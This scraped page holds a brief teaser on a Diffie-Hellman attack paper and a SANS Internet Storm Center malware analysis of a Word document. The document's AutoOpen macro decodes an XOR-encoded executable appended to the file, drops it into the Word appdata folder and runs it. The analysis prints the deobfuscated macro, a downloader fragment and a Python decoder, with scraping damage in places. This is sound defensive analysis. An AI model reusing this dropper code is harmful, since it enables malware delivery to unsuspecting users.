Hackin9

Speaking at a security conference (left to right): Whitfield Diffie, Martin Hellman, Brian Snow. (credit: Flickr user: Dan Farber)

Martijn Grooten is a mathematician-turned-security professional. He is currently Editor of Virus Bulletin and does the occasional security research on the side in which, wherever possible, he likes to use his mathematical background. This post originally appeared on Martijn's Lapsed Ordinary blog.

Earlier this year, a research paper presented a new attack against the Diffie-Hellman key exchange protocol. Among other things, the paper came with a reasonable explanation of how the NSA might be able to read a lot of the Internet’s VPN traffic. I wrote a blog about this in May.

Last month, the paper was presented at the ACM CCS 2015 conference and thus made the news again. While the research does have serious implications, it did not signal the end of the use of the Diffie-Protocol as some suggested.

Read 21 remaining paragraphs | Comments

 

This week, I was busy withan incidentwhich involved an interesting malicious Word document. OLE documents with malicious macros are not new, I receive a few of them every day in my mail trap. Until they remain a great wayto compromiseend-user computers, the flood wont stop. Usually, the macro is executed (the user is asked to enable its executionusing social engineering traps like The content of this document is protected, enable macros to view it"> BHJQWGDHJQWGDWQ = MSXML2. Ser ver X MLH TT PSet Tghafsdghqhjwgdhjqwgdjhqwgdqwd = CreateObject(BHJQWGDHJQWGDWQ)Tghafsdghqhjwgdhjqwgdjhqwgdqwd.Open G ET, ggFw

The goodpoint (or the bad point depending on the side youre located - attacker/defender) is thatthis helps to create interesting lists of IOCs with IP addresses, URLs, domains or filenames. Its quite easy to deobfuscate the macro and collect the IOCs.

In the incident I was involved, there was no network traffic generated by the malicious macro. The payload was already present andappendedat the endthe Word file. The document was generated in September 2015 and its VT score was only 2/43 (3days ago).I was the first to submit it. The content of the document was properly formatted, with interesting information for the victim (of course).I used Didier Stevenss toolbox toanalyze the document.

The document was created by a user Helmut"> $ oledump.py malicious.doc 1: 121 \x01CompObj 2: 4096 \x05DocumentSummaryInformation 3: 4096 \x05SummaryInformation 4: 23860 1Table 5: 781575 Data 6: 486 Macros/PROJECT 7: 71 Macros/PROJECTwm 8: m 940 Macros/VBA/ThisDocument 9: 3256 Macros/VBA/_VBA_PROJECT 10: 569 Macros/VBA/dir 11: M 6052 Macros/VBA/islamabad 12: 257675 WordDocument

The interesting macro is in the section 11 (notethename: islamabad"> $ oledump.py -s 11 -v malicious.doc

[Note:I performed some cleanup and deobfuscationin the macro code to make it more readable]

Basically, the malicious payload (a classic PE file) is appended to the Word document with extra data: the size of the payload and a checksum. Let"> Attribute VB_Name = islamabadPublic var_Filename1 As String"> Function func_Checksum(var_Data() As Byte, var_Len As Long) As Byte For I = 0 To var_Len - 1 func_Checksum = func_Checksum Xor var_Data(I) Next IEnd Function

The binary is XOR"> Function func_DecodeBinary(var_Data() As Byte, var_Len As Long) As Boolean Dim var_IV1 As Byte var_IV1 = 11 For I = 0 To var_Len - 1 var_Data(I) = var_Data(I) Xor var_IV1 var_IV1 = ((var_IV1 Xor 13) Xor (I Mod 256)) Next I func_DecodeBinary = TrueEnd Function

This function changes the document layout. (I don"> Function func_FormatDocument() As Boolean ActiveDocument.GrammarChecked = False ActiveDocument.SpellingChecked = False ActiveDocument.Select Selection.Font.ColorIndex = wdBlack Selection.Font.Underline = wdUnderlineNone Selection.HomeKey For Each sec In ActiveDocument.Sections For Each head In sec.Headers head.Range.Delete Next Next ViewDocument = TrueEnd FunctionSub AutoClose() ActiveDocument.SaveEnd Sub

And now the principal"> Sub AutoOpen() On Error GoTo ErrorCondition1 Dim var_Dummy1 As Boolean var_Dummy1 = func_FormatDocument() Dim fh_File1 Dim var_Filesize As Long Dim var_BinarySize As Long Dim var_Checksum As Byte

We get the file size, open it and extract the checksum (located EOF -4) and the binary stream size (EOF"> var_Filesize = FileLen(ActiveDocument.FullName) fh_File1 = FreeFile Open (ActiveDocument.FullName) For Binary As #fh_File1 Get #fh_File1, (var_Filesize - 4), var_Checksum Get #fh_File1, (var_Filesize - 3), var_BinarySize If var_BinarySize 8 Then GoTo ErrorCondition1 End If If (var_BinarySize + 4) var_Filesize Then GoTo ErrorCondition1 End If

The script computes the starting position of the data stream and prepare a byte array withthe correct size."> Dim var_Offset As Long var_Offset = var_Filesize - (var_BinarySize + 4) Dim var_BinaryData1() As Byte"> Get #fh_File1, var_Offset, var_BinaryData1 Close #fh_File1 If Not func_DecodeBinary(var_BinaryData1(), var_BinarySize) Then GoTo ErrorCondition1"> Dim var_Dummy2 As Byte var_Dummy2 = func_Checksum(var_BinaryData1(), var_BinarySize) If var_Checksum var_Dummy2 Then GoTo ErrorCondition1 End If

The default path to drop the payload is obfuscated.
(Value = appdata\Microsoft\Word"> var_Path1 = Environ(Chr(97) Chr(112) Chr(112) Chr(100) Chr(97) Chr(116) Chr(97)) Chr(92) Chr(77) Chr(105) Chr(99) Chr(114) Chr(111) Chr(115) Chr(111) Chr(102) Chr(116) Chr(92) Chr(87) Chr(111) Chr(114) Chr(100)

The object Scripting.FileSystemObject"> Set var_Object1 = CreateObject(Scripting Chr(46) Chr(70) Chr(105) Chr(108) Chr(101) Chr(83) Chr(121) Chr(115) Chr(116) Chr(101) Chr(109) Chr(79) Chr(98) Chr(106) Chr(101) Chr(99) Chr(116))

Just in case of the default path does not exists (which should not be the case because Word is present on the target system), the script uses another one (appdata"> If Not var_Object1.FolderExists(var_Path1) Then var_Path1 = Environ(Chr(97) Chr(112) Chr(112) Chr(100) Chr(97) Chr(116) Chr(97)) End If Set var_Object1 = Nothing Dim fh_File2 fh_File2 = FreeFile

The dropped payload filename is also obfuscated and we create the file
(Value: wfletxavb.exe)

Remark: I don"> var_Filename1 = var_Path1 \ Chr(119) Chr(102) Chr(108) Chr(101) Chr(116) Chr(120) Chr(97) Chr(118) Chr(98) Chr(46) Chr(101) Chr(120) Chr(101) Open (var_Filename1) For Binary As #fh_File2 Put #fh_File2, 1, var_BinaryData1 Close #fh_File2"> Set var_Object2 = CreateObject(WScript.Shell) var_Object2.Exec var_Filename1 Exit SubErrorCondition1: Close #fh_File1 Close #fh_File2 ActiveDocument.SaveEnd Sub

By reversing the macro, we can guess the starting position of the binary and extract itmanually via the Didiers cut-bytes.py tool.We need to skip the last bytes of the document (containing the payload size and checksum):

[Note:Didier added a new feature to his tools to help me to extract data: its now possible to specify to ignore bytes at the end of the file (the -5"> $ cut-bytes.py position:-5 malicious.doc binary.data$ file binary.databinary.data: data

The decoding function being in the macro, we can reuse it and write a specific decoder for the"> def FileDecode(input): output = code = 11 for iIter in range(len(input)): output += chr(ord(input[iIter]) ^ code) code = (code ^ 13) ^ (iIter % 256)"> $ cat binary.data | translate.py -f -s decoder_caseXXXX.py -o binary.exe FileDecode$ file binary.exebinary.exe: PE32 executable for MS Windows (GUI) Intel 80386 32-bit

ThisPE file was never sent to VirusTotal and is clearly malicious. More investigations are still ongoing.

The construction of the file (OLE document + PE file + checksum + PE file length) looks ideal to quickly allow the attackers to generate a new encoded PE file and just append it to the same Word document.I cant share the samples at this time, investigations are still ongoing.

Xavier Mertens
ISC Handler - Freelance Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

 
Internet Storm Center Infocon Status